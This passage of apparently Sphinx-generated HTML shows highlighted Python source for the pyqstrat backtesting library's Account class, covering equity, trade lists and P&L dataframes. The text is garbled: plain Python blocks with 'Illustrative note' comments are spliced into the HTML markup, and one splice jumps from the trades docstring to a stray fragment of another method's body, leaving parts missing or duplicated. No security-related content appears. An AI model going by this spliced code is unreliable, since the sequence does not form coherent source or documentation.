<span class=\"n\">symbol</span> <span class=\"o\">=</span> <span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span>\n <span class=\"k\">if</span> <span class=\"n\">symbol</span> <span class=\"ow\">not</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls</span><span class=\"p\">:</span> <span class=\"k\">continue</span>\n <span class=\"n\">position</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls</span><span class=\"p\">[</span><span class=\"n\">symbol</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">position</span><span class=\"p\">(</span><span class=\"n\">timestamp</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"n\">math</span><span class=\"o\">.</span><span class=\"n\">isclose</span><span class=\"p\">(</span><span class=\"n\">position</span><span class=\"p\">,</span> <span class=\"mi\">0</span><span class=\"p\">):</span> <span class=\"n\">positions</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">((</span><span class=\"n\">contract</span><span class=\"p\">,</span> <span class=\"n\">position</span><span class=\"p\">))</span>\n <span class=\"k\">return</span> <span class=\"n\">positions</span></div>\n \n<div class=\"viewcode-block\" id=\"Account.equity\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.Account.equity\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">equity</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">float</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;Returns equity in this account in Account currency. 
    def equity(self, timestamp: np.datetime64) -> float:
        '''Returns equity in this account in Account currency. Will cause calculation if Account has not previously
        calculated up to this date'''
        pnl = self._pnl.get(timestamp)
        if pnl is None:
            self.calc(timestamp)
            pnl = self._pnl[timestamp]
        return self.starting_equity + pnl
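    # Illustrative note: equity is computed lazily, so the identity
    #     account.equity(ts) == account.starting_equity + net_pnl_at_ts
    # holds even if calc() was never called explicitly for ts.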
    def trades(self,
               contract_group: ContractGroup | None = None,
               start_date: np.datetime64 = NAT,
               end_date: np.datetime64 = NAT) -> list[Trade]:
        '''Returns a list of trades with the given symbol and with trade date between (and including) start date
        and end date if they are specified. If symbol is None trades for all symbols are returned'''
        return [trade for trade in self._trades if (np.isnat(start_date) or trade.timestamp >= start_date) and (
            np.isnat(end_date) or trade.timestamp <= end_date) and (
            contract_group is None or trade.contract.contract_group == contract_group)]
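    # Illustrative note: the NAT defaults make both date bounds open-ended, e.g.
    #     account.trades(ibm_cg)                                  # all IBM trades
    #     account.trades(start_date=np.datetime64('2018-01-02'))  # on or after Jan 2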
</span>\n<span class=\"sd\"> If symbol is None trades for all symbols are returned&#39;&#39;&#39;</span>\n <span class=\"k\">return</span> <span class=\"n\">_roundtrip_trades</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trades</span><span class=\"o\">.</span><span class=\"n\">copy</span><span class=\"p\">(),</span> <span class=\"n\">contract_group</span><span class=\"p\">,</span> <span class=\"n\">start_date</span><span class=\"p\">,</span> <span class=\"n\">end_date</span><span class=\"p\">)</span></div>\n\n<div class=\"viewcode-block\" id=\"Account.df_pnl\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.Account.df_pnl\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">df_pnl</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">contract_groups</span><span class=\"p\">:</span> <span class=\"n\">ContractGroup</span> <span class=\"o\">|</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"n\">ContractGroup</span><span class=\"p\">]</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Returns a dataframe with P&amp;L columns broken down by contract group and symbol</span>\n<span class=\"sd\"> </span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> contract_group: Return PNL for this contract group. If None (default), include all contract groups</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"k\">if</span> <span class=\"n\">contract_groups</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span><span class=\"p\">:</span> \n <span class=\"n\">contract_groups</span> <span class=\"o\">=</span> <span class=\"nb\">list</span><span class=\"p\">(</span><span class=\"nb\">set</span><span class=\"p\">([</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">contract_group</span> <span class=\"k\">for</span> <span class=\"n\">contract</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contracts</span><span class=\"p\">]))</span>\n\n <span class=\"k\">if</span> <span class=\"nb\">isinstance</span><span class=\"p\">(</span><span class=\"n\">contract_groups</span><span class=\"p\">,</span> <span class=\"n\">ContractGroup</span><span class=\"p\">):</span> <span class=\"n\">contract_groups</span> <span class=\"o\">=</span> <span class=\"p\">[</span><span class=\"n\">contract_groups</span><span class=\"p\">]</span>\n\n <span class=\"n\">dfs</span> <span class=\"o\">=</span> <span class=\"p\">[]</span>\n <span class=\"k\">for</span> <span class=\"n\">contract_group</span> <span class=\"ow\">in</span> <span class=\"n\">contract_groups</span><span class=\"p\">:</span>\n <span class=\"k\">for</span> <span class=\"n\">contract</span> <span class=\"ow\">in</span> <span class=\"n\">contract_group</span><span class=\"o\">.</span><span class=\"n\">contracts</span><span class=\"p\">:</span>\n <span class=\"n\">symbol</span> <span class=\"o\">=</span> <span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span>\n <span class=\"k\">if</span> <span class=\"n\">symbol</span> <span 
class=\"ow\">not</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls</span><span class=\"p\">:</span> <span class=\"k\">continue</span>\n <span class=\"n\">df</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls</span><span class=\"p\">[</span><span class=\"n\">symbol</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">df</span><span class=\"p\">()</span>\n <span class=\"k\">if</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">df</span><span class=\"p\">)</span> <span class=\"o\">&gt;</span> <span class=\"mi\">1</span><span class=\"p\">:</span>\n <span class=\"n\">net_pnl_diff</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">diff</span><span class=\"p\">(</span><span class=\"n\">df</span><span class=\"o\">.</span><span class=\"n\">net_pnl</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">)</span> <span class=\"c1\"># np.diff returns a vector one shorter than the original</span>\n <span class=\"n\">last_index</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">nonzero</span><span class=\"p\">(</span><span class=\"n\">net_pnl_diff</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">last_index</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]):</span> \n <span class=\"n\">last_index_</span> <span class=\"o\">=</span> <span class=\"n\">last_index</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">][</span><span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">]</span> <span class=\"o\">+</span> <span class=\"mi\">1</span>\n <span class=\"n\">df</span> <span class=\"o\">=</span> <span class=\"n\">df</span><span class=\"o\">.</span><span class=\"n\">iloc</span><span class=\"p\">[:</span><span class=\"n\">last_index_</span> <span class=\"o\">+</span> <span class=\"mi\">1</span><span class=\"p\">]</span>\n <span class=\"n\">df</span><span class=\"p\">[</span><span class=\"s1\">&#39;contract_group&#39;</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">contract_group</span><span class=\"o\">.</span><span class=\"n\">name</span>\n <span class=\"n\">dfs</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">(</span><span class=\"n\">df</span><span class=\"p\">)</span>\n <span class=\"n\">ret_df</span> <span class=\"o\">=</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">concat</span><span class=\"p\">(</span><span class=\"n\">dfs</span><span class=\"p\">)</span>\n <span class=\"n\">ret_df</span> <span class=\"o\">=</span> <span class=\"n\">ret_df</span><span class=\"o\">.</span><span class=\"n\">sort_values</span><span class=\"p\">(</span><span class=\"n\">by</span><span class=\"o\">=</span><span class=\"p\">[</span><span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;contract_group&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;symbol&#39;</span><span class=\"p\">])</span>\n <span class=\"n\">ret_df</span> <span class=\"o\">=</span> <span class=\"n\">ret_df</span><span class=\"p\">[[</span><span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">,</span> <span 
class=\"s1\">&#39;contract_group&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;symbol&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;position&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;price&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;unrealized&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;realized&#39;</span><span class=\"p\">,</span> \n <span class=\"s1\">&#39;commission&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;fee&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;net_pnl&#39;</span><span class=\"p\">]]</span>\n <span class=\"k\">return</span> <span class=\"n\">ret_df</span></div>\n \n<div class=\"viewcode-block\" id=\"Account.df_account_pnl\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.Account.df_account_pnl\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">df_account_pnl</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">contract_group</span><span class=\"p\">:</span> <span class=\"n\">ContractGroup</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Returns PNL at the account level.</span>\n<span class=\"sd\"> </span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> contract_group: If set, we only return pnl for this contract_group. Otherwise we return pnl for all contract groups</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n\n <span class=\"k\">if</span> <span class=\"n\">contract_group</span> <span class=\"ow\">is</span> <span class=\"ow\">not</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"n\">symbols</span> <span class=\"o\">=</span> <span class=\"p\">[</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span> <span class=\"k\">for</span> <span class=\"n\">contract</span> <span class=\"ow\">in</span> <span class=\"n\">contract_group</span><span class=\"o\">.</span><span class=\"n\">contracts</span> <span class=\"k\">if</span> <span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls</span><span class=\"p\">]</span>\n <span class=\"n\">symbol_pnls</span> <span class=\"o\">=</span> <span class=\"p\">[</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls</span><span class=\"p\">[</span><span class=\"n\">symbol</span><span class=\"p\">]</span> <span class=\"k\">for</span> <span class=\"n\">symbol</span> <span class=\"ow\">in</span> <span class=\"n\">symbols</span><span class=\"p\">]</span>\n <span class=\"k\">else</span><span class=\"p\">:</span>\n <span class=\"n\">symbol_pnls</span> <span class=\"o\">=</span> <span class=\"nb\">list</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">())</span>\n\n <span class=\"n\">timestamps</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">calc_timestamps</span>\n <span 
class=\"n\">position</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">full</span><span class=\"p\">(</span><span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">),</span> <span class=\"mf\">0.</span><span class=\"p\">,</span> <span class=\"n\">dtype</span><span class=\"o\">=</span><span class=\"nb\">float</span><span class=\"p\">)</span>\n <span class=\"n\">realized</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">full</span><span class=\"p\">(</span><span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">),</span> <span class=\"mf\">0.</span><span class=\"p\">,</span> <span class=\"n\">dtype</span><span class=\"o\">=</span><span class=\"nb\">float</span><span class=\"p\">)</span>\n <span class=\"n\">unrealized</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">full</span><span class=\"p\">(</span><span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">),</span> <span class=\"mf\">0.</span><span class=\"p\">,</span> <span class=\"n\">dtype</span><span class=\"o\">=</span><span class=\"nb\">float</span><span class=\"p\">)</span>\n <span class=\"n\">fee</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">full</span><span class=\"p\">(</span><span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">),</span> <span class=\"mf\">0.</span><span class=\"p\">,</span> <span class=\"n\">dtype</span><span class=\"o\">=</span><span class=\"nb\">float</span><span class=\"p\">)</span>\n <span class=\"n\">commission</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">full</span><span class=\"p\">(</span><span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">),</span> <span class=\"mf\">0.</span><span class=\"p\">,</span> <span class=\"n\">dtype</span><span class=\"o\">=</span><span class=\"nb\">float</span><span class=\"p\">)</span>\n <span class=\"n\">net_pnl</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">full</span><span class=\"p\">(</span><span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">),</span> <span class=\"mf\">0.</span><span class=\"p\">,</span> <span class=\"n\">dtype</span><span class=\"o\">=</span><span class=\"nb\">float</span><span class=\"p\">)</span>\n\n <span class=\"k\">for</span> <span class=\"n\">i</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span> <span class=\"ow\">in</span> <span class=\"nb\">enumerate</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">):</span>\n <span class=\"k\">for</span> <span class=\"n\">symbol_pnl</span> <span class=\"ow\">in</span> <span class=\"n\">symbol_pnls</span><span class=\"p\">:</span>\n <span class=\"n\">_position</span><span class=\"p\">,</span> <span class=\"n\">_price</span><span class=\"p\">,</span> <span class=\"n\">_realized</span><span class=\"p\">,</span> <span class=\"n\">_unrealized</span><span class=\"p\">,</span> <span class=\"n\">_fee</span><span class=\"p\">,</span> <span class=\"n\">_commission</span><span class=\"p\">,</span> <span 
class=\"n\">_net_pnl</span> <span class=\"o\">=</span> <span class=\"n\">symbol_pnl</span><span class=\"o\">.</span><span class=\"n\">pnl</span><span class=\"p\">(</span><span class=\"n\">timestamp</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"n\">math</span><span class=\"o\">.</span><span class=\"n\">isfinite</span><span class=\"p\">(</span><span class=\"n\">_position</span><span class=\"p\">):</span> <span class=\"n\">position</span><span class=\"p\">[</span><span class=\"n\">i</span><span class=\"p\">]</span> <span class=\"o\">+=</span> <span class=\"n\">_position</span>\n <span class=\"k\">if</span> <span class=\"n\">math</span><span class=\"o\">.</span><span class=\"n\">isfinite</span><span class=\"p\">(</span><span class=\"n\">_realized</span><span class=\"p\">):</span> <span class=\"n\">realized</span><span class=\"p\">[</span><span class=\"n\">i</span><span class=\"p\">]</span> <span class=\"o\">+=</span> <span class=\"n\">_realized</span>\n <span class=\"k\">if</span> <span class=\"n\">math</span><span class=\"o\">.</span><span class=\"n\">isfinite</span><span class=\"p\">(</span><span class=\"n\">_unrealized</span><span class=\"p\">):</span> <span class=\"n\">unrealized</span><span class=\"p\">[</span><span class=\"n\">i</span><span class=\"p\">]</span> <span class=\"o\">+=</span> <span class=\"n\">_unrealized</span>\n <span class=\"k\">if</span> <span class=\"n\">math</span><span class=\"o\">.</span><span class=\"n\">isfinite</span><span class=\"p\">(</span><span class=\"n\">_fee</span><span class=\"p\">):</span> <span class=\"n\">fee</span><span class=\"p\">[</span><span class=\"n\">i</span><span class=\"p\">]</span> <span class=\"o\">+=</span> <span class=\"n\">_fee</span>\n <span class=\"k\">if</span> <span class=\"n\">math</span><span class=\"o\">.</span><span class=\"n\">isfinite</span><span class=\"p\">(</span><span class=\"n\">_commission</span><span class=\"p\">):</span> <span class=\"n\">commission</span><span class=\"p\">[</span><span class=\"n\">i</span><span class=\"p\">]</span> <span class=\"o\">+=</span> <span class=\"n\">_commission</span>\n <span class=\"k\">if</span> <span class=\"n\">math</span><span class=\"o\">.</span><span class=\"n\">isfinite</span><span class=\"p\">(</span><span class=\"n\">_net_pnl</span><span class=\"p\">):</span> <span class=\"n\">net_pnl</span><span class=\"p\">[</span><span class=\"n\">i</span><span class=\"p\">]</span> <span class=\"o\">+=</span> <span class=\"n\">_net_pnl</span>\n\n <span class=\"n\">df</span> <span class=\"o\">=</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"o\">.</span><span class=\"n\">from_records</span><span class=\"p\">(</span><span class=\"nb\">zip</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">,</span> <span class=\"n\">position</span><span class=\"p\">,</span> <span class=\"n\">unrealized</span><span class=\"p\">,</span> <span class=\"n\">realized</span><span class=\"p\">,</span> <span class=\"n\">commission</span><span class=\"p\">,</span> <span class=\"n\">fee</span><span class=\"p\">,</span> <span class=\"n\">net_pnl</span><span class=\"p\">),</span> \n <span class=\"n\">columns</span><span class=\"o\">=</span><span class=\"p\">[</span><span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;position&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;unrealized&#39;</span><span class=\"p\">,</span> <span 
class=\"s1\">&#39;realized&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;commission&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;fee&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;net_pnl&#39;</span><span class=\"p\">])</span>\n <span class=\"n\">df</span><span class=\"p\">[</span><span class=\"s1\">&#39;equity&#39;</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">starting_equity</span> <span class=\"o\">+</span> <span class=\"n\">df</span><span class=\"o\">.</span><span class=\"n\">net_pnl</span>\n <span class=\"k\">return</span> <span class=\"n\">df</span><span class=\"p\">[[</span><span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;position&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;unrealized&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;realized&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;commission&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;fee&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;net_pnl&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;equity&#39;</span><span class=\"p\">]]</span></div>\n \n<div class=\"viewcode-block\" id=\"Account.df_trades\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.Account.df_trades\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">df_trades</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> \n <span class=\"n\">contract_group</span><span class=\"p\">:</span> <span class=\"n\">ContractGroup</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">,</span> \n <span class=\"n\">start_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">,</span> \n <span class=\"n\">end_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Returns a dataframe of trades</span>\n<span class=\"sd\"> </span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> contract_group: Return trades for this contract group. 
    def df_trades(self,
                  contract_group: ContractGroup | None = None,
                  start_date: np.datetime64 = NAT,
                  end_date: np.datetime64 = NAT) -> pd.DataFrame:
        '''
        Returns a dataframe of trades

        Args:
            contract_group: Return trades for this contract group. If None (default), include all contract groups
            start_date: Include trades with date greater than or equal to this timestamp.
            end_date: Include trades with date less than or equal to this timestamp.
        '''
        trades = self.trades(contract_group, start_date, end_date)
        df = pd.DataFrame.from_records([(
            trade.contract.symbol,
            trade.timestamp,
            trade.qty,
            trade.price,
            trade.fee,
            trade.commission,
            trade.order.timestamp,
            trade.order.qty,
            trade.order.reason_code,
            (str(trade.order.properties.__dict__) if trade.order.properties.__dict__ else ''),
            (str(trade.contract.properties.__dict__) if trade.contract.properties.__dict__ else '')) for trade in trades],
            columns=['symbol', 'timestamp', 'qty', 'price', 'fee', 'commission', 'order_date', 'order_qty',
                     'reason_code', 'order_props', 'contract_props'])
        df = df.sort_values(by=['timestamp', 'symbol'])
        return df
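    # Illustrative note: order and contract properties are flattened to strings
    # above so the resulting dataframe stays rectangular and easy to export.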
class=\"ow\">in</span> <span class=\"n\">trades</span><span class=\"p\">],</span>\n <span class=\"n\">columns</span><span class=\"o\">=</span><span class=\"p\">[</span><span class=\"s1\">&#39;symbol&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;qty&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;price&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;fee&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;commission&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;order_date&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;order_qty&#39;</span><span class=\"p\">,</span>\n <span class=\"s1\">&#39;reason_code&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;order_props&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;contract_props&#39;</span><span class=\"p\">])</span>\n <span class=\"n\">df</span> <span class=\"o\">=</span> <span class=\"n\">df</span><span class=\"o\">.</span><span class=\"n\">sort_values</span><span class=\"p\">(</span><span class=\"n\">by</span><span class=\"o\">=</span><span class=\"p\">[</span><span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;symbol&#39;</span><span class=\"p\">])</span>\n <span class=\"k\">return</span> <span class=\"n\">df</span></div>\n \n<div class=\"viewcode-block\" id=\"Account.df_roundtrip_trades\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.Account.df_roundtrip_trades\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">df_roundtrip_trades</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> \n <span class=\"n\">contract_group</span><span class=\"p\">:</span> <span class=\"n\">ContractGroup</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">,</span> \n <span class=\"n\">start_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">,</span> \n <span class=\"n\">end_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Returns a dataframe of round trip trades</span>\n<span class=\"sd\"> </span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> contract_group: Return trades for this contract group. 
If None (default), include all contract groups</span>\n<span class=\"sd\"> start_date: Include trades with date greater than or equal to this timestamp.</span>\n<span class=\"sd\"> end_date: Include trades with date less than or equal to this timestamp.</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"n\">rt_trades</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">roundtrip_trades</span><span class=\"p\">(</span><span class=\"n\">contract_group</span><span class=\"p\">,</span> <span class=\"n\">start_date</span><span class=\"p\">,</span> <span class=\"n\">end_date</span><span class=\"p\">)</span>\n <span class=\"n\">df_rts</span> <span class=\"o\">=</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"o\">.</span><span class=\"n\">from_records</span><span class=\"p\">([</span><span class=\"nb\">dict</span><span class=\"p\">(</span>\n <span class=\"n\">symbol</span><span class=\"o\">=</span><span class=\"n\">s</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span><span class=\"p\">,</span> \n <span class=\"n\">multiplier</span><span class=\"o\">=</span><span class=\"n\">s</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">multiplier</span><span class=\"p\">,</span> \n <span class=\"n\">entry_timestamp</span><span class=\"o\">=</span><span class=\"n\">s</span><span class=\"o\">.</span><span class=\"n\">entry_timestamp</span><span class=\"p\">,</span>\n <span class=\"n\">exit_timestamp</span><span class=\"o\">=</span><span class=\"n\">s</span><span class=\"o\">.</span><span class=\"n\">exit_timestamp</span><span class=\"p\">,</span>\n <span class=\"n\">qty</span><span class=\"o\">=</span><span class=\"n\">s</span><span class=\"o\">.</span><span class=\"n\">qty</span><span class=\"p\">,</span>\n <span class=\"n\">entry_price</span><span class=\"o\">=</span><span class=\"n\">s</span><span class=\"o\">.</span><span class=\"n\">entry_price</span><span class=\"p\">,</span>\n <span class=\"n\">exit_price</span><span class=\"o\">=</span><span class=\"n\">s</span><span class=\"o\">.</span><span class=\"n\">exit_price</span><span class=\"p\">,</span>\n <span class=\"n\">entry_reason</span><span class=\"o\">=</span><span class=\"n\">s</span><span class=\"o\">.</span><span class=\"n\">entry_reason</span><span class=\"p\">,</span>\n <span class=\"n\">exit_reason</span><span class=\"o\">=</span><span class=\"n\">s</span><span class=\"o\">.</span><span class=\"n\">exit_reason</span><span class=\"p\">,</span>\n <span class=\"n\">entry_commission</span><span class=\"o\">=</span><span class=\"n\">s</span><span class=\"o\">.</span><span class=\"n\">entry_commission</span><span class=\"p\">,</span>\n <span class=\"n\">exit_commission</span><span class=\"o\">=</span><span class=\"n\">s</span><span class=\"o\">.</span><span class=\"n\">exit_commission</span><span class=\"p\">,</span>\n <span class=\"n\">net_pnl</span><span class=\"o\">=</span><span class=\"n\">s</span><span class=\"o\">.</span><span class=\"n\">net_pnl</span><span class=\"p\">)</span> <span class=\"k\">for</span> <span class=\"n\">s</span> <span class=\"ow\">in</span> <span class=\"n\">rt_trades</span><span class=\"p\">])</span>\n <span class=\"n\">df_rts</span> <span class=\"o\">=</span> <span class=\"n\">df_rts</span><span class=\"o\">.</span><span class=\"n\">sort_values</span><span 
